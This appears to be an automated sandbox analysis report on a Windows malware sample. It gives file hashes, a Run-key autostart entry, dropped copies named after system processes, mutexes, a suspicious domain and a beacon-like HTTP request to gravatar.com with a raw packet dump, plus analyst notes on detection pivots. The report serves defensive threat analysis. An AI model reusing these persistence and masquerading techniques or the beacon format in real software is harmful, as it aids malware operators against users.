Analysis Date: 2014-09-01 02:40:40
MD5: 6a86113a95a49243aaee0b53f34aca0b
SHA1: f8c15468d32db527119e960ecf511a7f2a984bb6

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: d2cb85d6718e74364d174b100ffbe336 sha1: 63b73ce8ea2d9d98ea76180c328043e0b5809b29 size: 100352
Section .tls   md5: aa74188c3c1a960d78aa99eaca5ac266 sha1: 944893e919f7ea45af7d54bae5c5cc0c6d184020 size: 1536
Section .data  md5: 001025d2529887d5db0c1b531a30f420 sha1: 076f61d2d2d92a17e012c05026a22428f3c30a77 size: 67584
Section .reloc md5: c3de424b2cefa4e58d6f06d0eb34a855 sha1: e0900972403e775249bb5a48fffd3254397d3163 size: 1024
Timestamp: 2005-11-09 08:56:12 (PE header compile timestamp; it is written by the build tool and is trivially forgeable, so it should not be used on its own to date the sample)
PEhash: 7ea6d32dbd9bb02d62a640c49a0a74949cdaa140
IMPhash: bf1ba673400d770ca178413009bea1d8

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
(machine-wide Run-key autostart entry; note the target is a copy dropped under the user's Application Data directory, not the legitimate conhost.exe in %SystemRoot%\System32 — the user-profile path is the detection pivot here)
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe start C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe % C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe start C:\Documents and Settings\Administrator\Application Data\dwm.exe % C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
(the text after `%` appears to be the sandbox's working-directory field rather than part of the command line — verify against the sandbox's record format; both child binaries reuse names of legitimate Windows processes (csrss.exe, dwm.exe) but are launched from user-writable profile directories)
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {1ACD3490-8843-47EB-867B-EDDDD7FA37FD}
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {6988405C-71C3-427c-975A-0398706E79EE}
(the WininetConnectionMutex and the `c:!...!` mutexes are the kind created by WinINet/IE cache use; the GUID-style ones — note {A5B35993-...} and {B5B35993-...} differ only in the first character — are the better candidates for sample-specific infection markers, but that should be confirmed against a clean baseline)
Winsock DNS: 127.0.0.1
Winsock DNS: happyratatuy.com
Winsock DNS: gravatar.com

Process
↳ C:\malware.exe start C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe % C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe start C:\Documents and Settings\Administrator\Application Data\dwm.exe % C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: gravatar.com
Type: A
192.0.80.242
DNS: gravatar.com
Type: A
192.0.80.239
DNS: gravatar.com
Type: A
192.0.80.240
DNS: gravatar.com
Type: A
192.0.80.241
DNS: happyratatuy.com
Type: A (no answer recorded in this report, unlike the four A records returned for gravatar.com above; the domain may have been unregistered or sinkholed at analysis time — confirm before treating the gravatar traffic as the sample's only C2 path)
HTTP GET: http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v51=33&tq=gHZutDyMv5rJeTTia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 192.0.80.242:80
(the destination is a legitimate public service, but the query string is malformed — a second `?` follows the gravatar_id — and carries an opaque base64-like `tq` value, while the lowercase `mozilla/2.0` User-Agent matches no mainstream browser; both are usable network-detection pivots. The raw PCAP below shows the request was sent as HTTP/1.0 with `Connection: close`)

Raw Pcap
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626532 3f763531   bcfe64067be2?v51
0x00000040 (00064)   3d333326 74713d67 485a7574 44794d76   =33&tq=gHZutDyMv
0x00000050 (00080)   35724a65 54546961 396e726d 736c3667   5rJeTTia9nrmsl6g
0x00000060 (00096)   69577a25 32424a5a 62567941 25334420   iWz%2BJZbVyA%3D 
0x00000070 (00112)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000080 (00128)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000090 (00144)   743a2067 72617661 7461722e 636f6d0d   t: gravatar.com.
0x000000a0 (00160)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000b0 (00176)   65722d41 67656e74 3a206d6f 7a696c6c   er-Agent: mozill
0x000000c0 (00192)   612f322e 300d0a0d 0a                  a/2.0....


Strings
...
z
;
.U
a
080904b0
1.0.0.1
1594
FileVersion
&No Exit  Shift+N
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
&Yes
|0h;	A
0h;\]h!Jm
0hvhs8&
0hW'%:
'1awjx`M
~>/1EIPI
{1~F 1
1FW]Jc
!	1;iY>*S
1l Nl9
1NMPh]j
:1wf8OMp
2h5[ h
2h}BhsH
2h;iia
2hKBh&
2hk"hY
,2h#ph
3KM?i`
3M8'~e
3Ph3BhN
3)wy8W
3YxM`h]+J
:45\km3
=]4Bhh
4BY3yO
[[4to^n
.5;['%
5={>An
-.5F5i
>5{`hS
6',2o,
6mo;rh
]6rhJA_
6\UMc h9
71)%u4
7AoRh}Q
7.Rich
^7ZQ h
83gtPh
8h2.dl
8@h(Bhs>
8`h^hRh
8%QPs9e4
]%92ht
9eiC	7:6>
9GLnit
9ZqfH0
a3 ht h
abh/oF
aCN$V]
a*`hU%
aiL	d4
ajX|OD=
aL)HYw
AlphaBlend
a<N"h	=
ar%4[o
AUu{Q[
az7j~";
B%6,pdH1%
bhhj#$@h
Bh"h/V
BhM4Mg
bhV`h{;
B]:LL2
BO]Hf'@
BS3uz/
c4(-SGSPh{
c9,F"h
%cDIXCN
CoCreateInstance
CoGetMalloc
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
`c(P$<7
C[PhyX
C\QfXb
CreateFontIndirectA
c}rUh/
d2h.2h
d6ft{1x
DA[2hGi
@.data
DeleteCriticalSection
DeleteObject
DgBh?U
*DGPhaD
diIJBhK
dI.Rhc
Dphc%<J
dVsbhn1:
e[2~`\
e7)f`h
E`D%hI
eE0hm'
e.F\U2
e],`h8
EI"1E*
EnterCriticalSection
EnumResourceTypesA
eop1AYxO
e!\Rh7
f0h~rh1
f3U'oM
f!9&@h
'fb88z
fem-T@hS
fF#lH	e^1
F^/KE6
Fmwt9B
}F^Ph=5
f)Q@h4"hT
FreeEnvironmentStringsA
FreeEnvironmentStringsW
gDCh.$I
GDI32.dll
?~gdPhTs
GetACP
GetCPInfo
GetCPInfoExW
GetCurrentProcessId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastError
GetLocaleInfoA
GetOEMCP
GetStartupInfoA
GetStdHandle
GetTextExtentPointA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersionExA
<](gg#
G>`h@h
gij]@h
g	jW#v9
}Gz0hg
`h)?,(
H0h.0h
h0hIph
h))0hWf
h^2h:8
h2hF6x
h%3@h.
h&4)3F
	|$"h5
h6rh2h
h7tu8w.:5
h?	-%9AG
 ha0hl"h
hA43-z
Haab&s
hbh[QW
hbhw]^.X
h<Bv4`
h/]CUDo
hD0hvqm
hdbh h
h%/D/I
he0h\c
"h$eaJ/
HeapSize
h{;e{u
hfHlV\ h
hFx8djH{
hGHsz5
"h%@h%
h	`h(/
h h/5|d
hh5{ph
h"h7cZm
h@h/aY
h`hEFI
hhGDI3
h hhTv
h>`h.N
h hph[
,"h hT
h?J5?o3
hJ h:^%
hJ`h5[7
hJrhGc;
hl+ hY
HlM=QfbhV
hlX`haj
h(~'lz~?
hNRhuV
H}N+]Y<
HO6JLM/u
@hOphe
ho/x[l
h<ph3rh
hPhBh%
hPhh9{Z
hPh{lo
hPho(}
hphphL
hPh,uX
hQC7`h<Rh
hqRhuVRh
hRh?+#
@hrh2h
hRhc-ZU
hrheph
ht<H5@h
hTMwv}+
htq"h^.F
h=U*7D%
`huCrh
hu%s.4
h%uv h
hU|xx^*
hvEGRh"h
h!(vq"h
=`hw$9
h!W%A*-
hxOFI!
h(z>Y"h
i%$H&3
InitializeCriticalSection
InterlockedExchange
InterlockedIncrement
i	\Ogx
is_b y
=\I:#U
iZ#ph4
J0hrh9
j2h h~
J6s-6,
JgsyCs:
j}i6S`D
KERNEL32.dll
K h,.0h
(K@h0hBh
KHJ=#9
?k[LPh
KR2M}tI\
%%.kr4
KuLf=1
ku%WN/
k/.y0h
LeaveCriticalSection
LG]Iyd
L^ hbh
$liV0h
LkieLQ
LoadLibraryW
L@*qt.
lstrlenW
LvbhF=+;
m^54W.^(7
M8"X[-'9ST
mJp'.>
MKph/G]
M_K/^w h
MSIMG32.dll
MultiByteToWideChar
mVmx;M
m:%W;8w&
mZlOpIz
n0hJdjU
+n% 5O[
#(nh1LC8
nhnPh5
nk3a{0hj
n=RhZz
NS-:+5
NvvzE`=
Nxn^>[<)5x
	nXqg"h
o26i-`
Odb,nFm#d&
of=ZT!f
ole32.dll
OL<I}Q
oLue7a:
oph^	rh^
OpOT;k
Ph0h"h
.~:Ph4
Ph+G5}
>ph@hnPh
Ph<>#hUDH@h
Phn0h+E
PhRh]u#,Wt
phs<8`h}
p+l/h`{
puMmv(
Qf h1vi1
QhAzRh
q"h@hbh
Q|H?qL
qRhj~S(a
QtDkFSK
QueryPerformanceCounter
 qv9_0%_
r0Hge'R
R4f{4YN
RaiseException
`RbBwpHP
.reloc
RhbhIQ
RhBhU hg
rh-_F:
rh,gPh
rh"h"h
RhLh;^2hrh
Rhn{,e
Rh>OPh{
Rh$)Q~^
{RhQt"h
^rhsq!
Rh,-:x
rUrf>@
) s=`%
/-s?06
s0hm3X
:S1%Eg
&|S<2h
S4x:Fe
SelectObject
SetHandleCount
S`h h]d
`Si#a.
SLFY:hy~
StringFromGUID2
~T?=2h
TA1wLM
}T/%As1
t$f?0h
T&g<T=
!This program cannot be run in DOS mode.
Ths[+Z
TlsGetValue
TlsSetValue
T@MG	>#:aT
TransparentBlt
T~SSdx0
TTzo=>
TVU&+%nN
]u1~8;
-\#U9!
uF&`h:
UnhandledExceptionFilter
u*Q-Ad:jk9U
<uS2h:Z
uU*s ,a
`uX{$9
_UXk$g
@v.2"#
V2h"hx
V[_cTaM
V}|IdR
VjtG\o
v+/Lx"
v%'nQU
vPh	9u*F
VS&'AT
vtuph3
VWk%lL,
\$V	XAG
vX#k<N?$m
;V&zRhS
w?_BSK
WeU%y]$
)	?W"h
W> h5h
WideCharToMultiByte
Wl9*)j
wL{*`'l_
WriteFile
Wsr7'S
Wx7&\phJ
x5h*@h
X9!95y
Xa\+|E
xf92m(
+_xi`Bh
x@ijS&
*XkZ]n@h
x-|\(nD
XRheZKmo
x%ru7ro
XSZE!~
*XxIAwf
Y]:0hPh
Y888EE"h:A:
<~&y@D
y-}{eC
YG4Zw:G
yG hW6l
(y{Hi"-
yn[y`h
Z2hUGM
z2hv0h8"h
Z3ay<$xC
Z6TCQB
Z9V_rh=~S
*ZP	#F
z,PhPhQ
ztK>{'